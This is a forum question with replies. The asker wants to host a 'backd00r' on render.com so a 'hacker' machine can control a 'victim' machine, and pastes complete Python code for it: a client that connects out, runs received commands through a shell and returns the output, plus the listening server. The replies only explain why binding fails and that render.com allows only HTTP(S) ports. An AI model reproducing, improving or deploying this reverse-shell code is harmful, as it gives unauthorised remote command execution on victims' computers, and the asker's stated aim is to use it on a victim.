how to create a backd00r using python library "socket" and free hosting on render.com?
I took the code from the Internet, there is a "victim" and a "hacker". The "hacker" runs a server on his computer (server.py), and the victim connects using "client.py". If locally, everything works, but when I try to deploy it on render.com, an error appears:
OSError: [Errno 99] Cannot assign requested address
Below I will provide a link to GitHub, which contains server.py and client.py,
please help me make it so that I can bind my computer as a "Hacker" to the remote computer of the "Victim" via render.com
I tried using different ip, ports, server hostings
client.py:
# Imports
from ctypes.wintypes import INT
import socket
import subprocess


# Setting Up IP/Sockets
REMOTE_HOST = 'There need any ip, but which?' 
REMOTE_PORT = 8081 # 2222
FORMAT = 'utf-8'
client = socket.socket()

# Initializing Connection
print("[-] Connection Initiating...")
client.connect((REMOTE_HOST, REMOTE_PORT))
print("[-] Connection initiated!")

# Runtime Loop
while True:
    print("[-] Awaiting commands...")
    command = client.recv(1024)
    command = command.decode(FORMAT, errors='ignore')
    op = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
    output = op.stdout.read()
    output_error = op.stderr.read()
    print("[-] Sending response...")
    client.send(output + output_error)

server.py:
# Imports
import socket

# Creating Listening Port
HOST = '0.0.0.0' # '192.168.43.82'
PORT = 10000 # 2222
FORMAT = 'utf-8'

server = socket.socket()
server.bind((HOST, PORT))

# Starting Server
print('[+] Server Started')
print('[+] Listening For Client Connection ...')
server.listen(1)
client, client_addr = server.accept()
print(f'[+] {client_addr} Client connected to the server')

# Reciving Commands
while True:
    command = input('Enter Command : ')
    command = command.encode(FORMAT, errors='ignore')
    client.send(command)
    print('[+] Command sent')
    output = client.recv(1024)
    output = output.decode(FORMAT, errors='ignore')
    print(f"Output: {output}")

Github: 
https://github.com/SY-DIE/vir/tree/main


To be reached, your server needs to have a publicly routable IP. Not behind NAT, like a typical residential or mobile site

You cannot bind to the IP address of a different computer.   It simply makes no sense ... and the operating system won't allow it (because it is nonsensical).  When you bind to 0.0.0.0 that is a shorthand for "all available IPs on >this< computer".  And that apparently doesn't work because of restrictions specific to render.com.

You cannot bind to the IP address of a different computer.   It simply makes no sense ... and the operating system won't allow it (because it is nonsensical).  When you bind to 0.0.0.0 that is a shorthand for "all available IPs on >this< computer".
And that apparently binding to 0.0.0.0 port 10000 (or 8081 or 2222) doesn't work because of restrictions specific to render.com.
Apparently render.com only allows binding to HTTP and HTTPS ports; i.e. 80 and 443.  See this answer.

Only HTTP(S) based web services are publicly accessible on Render.com.
You can't host arbitrary TCP servers like yours on Render.com.
